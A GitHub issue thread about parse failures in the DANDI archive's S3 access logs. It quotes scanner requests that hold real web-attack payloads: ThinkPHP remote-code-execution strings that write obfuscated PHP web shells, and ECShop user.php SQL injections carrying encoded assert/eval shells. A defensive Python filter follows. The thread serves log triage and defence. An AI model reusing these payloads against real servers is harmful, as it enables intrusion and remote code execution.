[Line parsing errors]: 7/26/2024 #18

Closed
CodyCBakerPhD opened this issue Jul 26, 2024 · 5 comments · Fixed by #25
Comments

@CodyCBakerPhD (Member)

A list of line parsing errors found during full log parsing

@CodyCBakerPhD CodyCBakerPhD self-assigned this Jul 26, 2024
@CodyCBakerPhD (Member, Author)

These look like some of those original problem ones mentioned by Roni, potentially some kind of attack on the archive from around that time?

@CodyCBakerPhD (Member, Author)

One thing I just noticed - despite these being GET requests, that / before the query indicates these have no target.

So easily, we should just be able to early return against an unspecified asset blob.

@CodyCBakerPhD (Member, Author) commented Jul 26, 2024

Some of them do use /user.php as the target though, so perhaps start forming an exclusion list for these 'bad' targets?

@CodyCBakerPhD (Member, Author) commented Jul 26, 2024

The last 3 items do actually seem like legit lines, no idea why they are so much longer than expected though...

@CodyCBakerPhD (Member, Author)

Line 7465090 of /mnt/backup/dandi/dandiarchive-logs/2023/01/06.log (parsed 29 items):

8787a3c41bf7ce0d54359d9348ad5b08e16bd5bb8ae5aa4e1508b435773a066e dandiarchive [06/Jan/2023:12:29:11 +0000] ???.???.???.??? - MJH1XJ8DHPSZFND7 REST.GET.OBJECT / "GET //?s=index/\think\template\driver\file/write&cacheFile=robots.php&content=xbshell1<?php$password%20=%20"xinba";$ch%20=%20explode(".","hello.ass.world.er.t");array_intersect_ukey(array($_REQUEST[$password]%20=>%201),%20array(1),%20$ch[1].$ch[3].$ch[4]);?> HTTP/1.1" 404 NoSuchKey 272 - 9 - "https://dandiarchive.s3.amazonaws.com//?s=index/\think\template\driver\file/write&cacheFile=robots.php&content=xbshell1<?php$password%20=%20"xinba";$ch%20=%20explode(".","hello.ass.world.er.t");array_intersect_ukey(array($_REQUEST[$password]%20=>%201),%20array(1),%20$ch[1].$ch[3].$ch[4]);?>" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" - V9t1ypjyDY4plW1QdEvZxgIn2dEET3gncqHpXCat9UyAups5FXGyiU0kcrI2fWZmTh66E67H/tI= - ECDHE-RSA-AES128-GCM-SHA256 - dandiarchive.s3.amazonaws.com TLSv1.2 - -

Line 7465091 of /mnt/backup/dandi/dandiarchive-logs/2023/01/06.log (parsed 29 items):

8787a3c41bf7ce0d54359d9348ad5b08e16bd5bb8ae5aa4e1508b435773a066e dandiarchive [06/Jan/2023:12:29:11 +0000] ???.???.???.??? - MJH3H3PKH9Z9D6PA REST.GET.OBJECT / "GET //?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=12345.php&vars[1][1]=<?php%20$poc%20="axsxsxexrxt";$poc_1%20=%20explode("x",%20$poc);%20$poc_2%20=%20$poc_1[0]%20.%20$poc_1[1]%20.%20$poc_1[2]%20.%20$poc_1[3].%20$poc_1[4].%20$poc_1[5];$poc_2(urldecode(urldecode(urldecode($_REQUEST['12345']))));?> HTTP/1.1" 404 NoSuchKey 272 - 6 - "https://dandiarchive.s3.amazonaws.com//?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=12345.php&vars[1][1]=<?php%20$poc%20="axsxsxexrxt";$poc_1%20=%20explode("x",%20$poc);%20$poc_2%20=%20$poc_1[0]%20.%20$poc_1[1]%20.%20$poc_1[2]%20.%20$poc_1[3].%20$poc_1[4].%20$poc_1[5];$poc_2(urldecode(urldecode(urldecode($_REQUEST['12345']))));?>" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" - pCf6sLR6ICzDfa+RoYY9VrqIy8+PvTo5wXI8Of14dU05gpx23amAPH0D97ZkEGUERB/R1eywl8I= - ECDHE-RSA-AES128-GCM-SHA256 - dandiarchive.s3.amazonaws.com TLSv1.2 - -

Line 7465097 of /mnt/backup/dandi/dandiarchive-logs/2023/01/06.log (parsed 31 items):

8787a3c41bf7ce0d54359d9348ad5b08e16bd5bb8ae5aa4e1508b435773a066e dandiarchive [06/Jan/2023:12:29:11 +0000] ???.???.???.??? - MJHFR6QSYZKVHX74 REST.GET.OBJECT /user.php "GET //user.php?act=login HTTP/1.1" 404 NoSuchKey 280 - 11 - "554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:288:"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A325A6B5A334575634768774A79776E50443977614841675A585A686243676B583142505531526262475678645630704F79412F506963702729293B2F2F7D787878,10-- -";s:2:"id";s:3:"'/*";}" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" - 0MfP9hPBK/cjYasCVnWUbcxuUTT0mLe+RBIFMfOncGl2kIulc20uAPgn57R7NntGmQF3ECgx/18= - ECDHE-RSA-AES128-GCM-SHA256 - dandiarchive.s3.amazonaws.com TLSv1.2 - -

Line 7465106 of /mnt/backup/dandi/dandiarchive-logs/2023/01/06.log (parsed 30 items):

8787a3c41bf7ce0d54359d9348ad5b08e16bd5bb8ae5aa4e1508b435773a066e dandiarchive [06/Jan/2023:12:29:20 +0000] ???.???.???.??? - 3X3CX6VTPS00Y2RR REST.GET.OBJECT /user.php "GET //user.php?act=login HTTP/1.1" 404 NoSuchKey 280 - 8 - "45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:297:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A336C7A655846784C6E426F634363734A7A772F63476877494756325957776F4A46395154314E5557336C7A655630704F79412F506963702729293B2F2F7D787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}45ea207d7a2b68c49582d2d22adf953a" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" - R2/BoGjLaVZbis4u4mXGhGlWfig+HLVzglqO78SApIyxZryIvHmFBBsY+a21pY50cTHJgelSvhI= - ECDHE-RSA-AES128-GCM-SHA256 - dandiarchive.s3.amazonaws.com TLSv1.2 - -

Line 129479 of /mnt/backup/dandi/dandiarchive-logs/2023/06/26.log (parsed 37 items):

8787a3c41bf7ce0d54359d9348ad5b08e16bd5bb8ae5aa4e1508b435773a066e dandiarchive [26/Jun/2023:03:05:52 +0000] ???.???.???.??? - R31NYYY1MNCHGZ7C REST.GET.OBJECT blobs/231/012/2310125d-3596-445d-af64-583c7c236000 "GET /blobs/231/012/2310125d-3596-445d-af64-583c7c236000 HTTP/1.1" 200 - 13803712 938143890946 608 50 "-" ""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36" - m9ocmJgmUpsmoNaemUjpSSP1V1W4DkLtfCXmJ3Kci8qXqEFKc5yBRyh05FRAmte4U1uONY6H+Es= - ECDHE-RSA-AES128-GCM-SHA256 - dandiarchive.s3.amazonaws.com TLSv1.2 - -

Line 129480 of /mnt/backup/dandi/dandiarchive-logs/2023/06/26.log (parsed 37 items):

8787a3c41bf7ce0d54359d9348ad5b08e16bd5bb8ae5aa4e1508b435773a066e dandiarchive [26/Jun/2023:03:05:53 +0000] ???.???.???.??? - 5PCGX9WKFQMJH6FB REST.GET.OBJECT blobs/080/1d9/0801d996-200e-4173-ab49-d1784427e96a "GET /blobs/080/1d9/0801d996-200e-4173-ab49-d1784427e96a HTTP/1.1" 200 - 6616308 422868123111 205 35 "-" ""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36" - A54Zaz7Sl0ygUFZ4lEOYCXHxImvTGXnvR+rr9+JcM/gceQWDObRkwnP9nO+wK70lpMaaE78SWvA= - ECDHE-RSA-AES128-GCM-SHA256 - dandiarchive.s3.amazonaws.com TLSv1.2 - -

Line 129508 of /mnt/backup/dandi/dandiarchive-logs/2023/06/26.log (parsed 37 items):

8787a3c41bf7ce0d54359d9348ad5b08e16bd5bb8ae5aa4e1508b435773a066e dandiarchive [26/Jun/2023:03:05:52 +0000] ???.???.???.??? - R31GFNRPCDN259VV REST.GET.OBJECT blobs/fae/b55/faeb55de-5809-4a40-a2fe-bd32edad90e4 "GET /blobs/fae/b55/faeb55de-5809-4a40-a2fe-bd32edad90e4 HTTP/1.1" 200 - 25024056 393912179529 1015 70 "-" ""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36" - LPUZltF7LVqXVSTqIMLPb/QZ/QDV0DuHmX7s3LuXT/ZmKIi9b4SmEDHlQYVYmCKPGM6JOkFMV28= - ECDHE-RSA-AES128-GCM-SHA256 - dandiarchive.s3.amazonaws.com TLSv1.2 - -
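As an added example (not the project's own parser), a triage pass that implements the early return and exclusion list proposed in the comments above: it reads only the fixed-position header fields of an S3 server access log line, skips GET requests whose key is an excluded target or not an archive blob, and keeps the rest. The sample lines are constructed in the shape of the entries above with payload bodies and ids replaced by placeholders; the `blobs/` key prefix and the exclusion set are assumptions drawn from this thread.

```python
import re
from collections import Counter
from typing import Iterable, Optional

# Constructed sample lines shaped like the S3 server access log entries in the issue.
# OWNER, HOSTID and PLACEHOLDER stand in for real values; IPs are redacted as in the issue.
SAMPLE_LINES = [
    'OWNER dandiarchive [06/Jan/2023:12:29:11 +0000] ???.???.???.??? - REQID1 '
    'REST.GET.OBJECT / "GET //?s=index/PLACEHOLDER HTTP/1.1" 404 NoSuchKey 272 - 9 - '
    '"-" "-" - HOSTID - ECDHE-RSA-AES128-GCM-SHA256 - dandiarchive.s3.amazonaws.com TLSv1.2 - -',
    'OWNER dandiarchive [06/Jan/2023:12:29:11 +0000] ???.???.???.??? - REQID2 '
    'REST.GET.OBJECT /user.php "GET //user.php?act=login HTTP/1.1" 404 NoSuchKey 280 - 11 - '
    '"-" "-" - HOSTID - ECDHE-RSA-AES128-GCM-SHA256 - dandiarchive.s3.amazonaws.com TLSv1.2 - -',
    'OWNER dandiarchive [26/Jun/2023:03:05:52 +0000] ???.???.???.??? - REQID3 '
    'REST.GET.OBJECT blobs/231/012/2310125d-3596-445d-af64-583c7c236000 '
    '"GET /blobs/231/012/2310125d-3596-445d-af64-583c7c236000 HTTP/1.1" 200 - 13803712 '
    '938143890946 608 50 "-" "Mozilla/5.0" - HOSTID - ECDHE-RSA-AES128-GCM-SHA256 - '
    'dandiarchive.s3.amazonaws.com TLSv1.2 - -',
]

# The fields before the quoted request line never contain whitespace (the key is
# URL-encoded by S3), so they can be matched positionally no matter what follows.
# The request line ends at the first ' HTTP/x.y" <status> ', which is reliable even
# when the referer later repeats the whole URI.
HEADER = re.compile(
    r'^(?P<owner>\S+) (?P<bucket>\S+) \[(?P<time>[^\]]+)\] (?P<ip>\S+) (?P<requester>\S+) '
    r'(?P<request_id>\S+) (?P<operation>\S+) (?P<key>\S+) '
    r'"(?P<request>.*?) HTTP/\d\.\d" (?P<status>\d{3}) '
)

ASSET_KEY_PREFIXES = ("blobs/",)      # assumption: archive assets live under blobs/
EXCLUDED_KEYS = {"/", "/user.php"}   # 'bad' targets called out in the issue


def triage(line: str) -> tuple[str, Optional[dict]]:
    """Classify one log line without parsing its free-text tail."""
    m = HEADER.match(line)
    if m is None:
        return "malformed", None
    fields = m.groupdict()
    if fields["operation"].startswith("REST.GET.OBJECT"):
        if fields["key"] in EXCLUDED_KEYS:
            return "excluded", fields          # early return: known scanner target
        if not fields["key"].startswith(ASSET_KEY_PREFIXES):
            return "no-asset", fields          # GET with no archive blob specified
    return "asset", fields


def summarize(lines: Iterable[str]) -> Counter:
    """Count how many lines fall into each triage bucket."""
    return Counter(triage(line)[0] for line in lines)
```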

@CodyCBakerPhD CodyCBakerPhD linked a pull request Aug 11, 2024 that will close this issue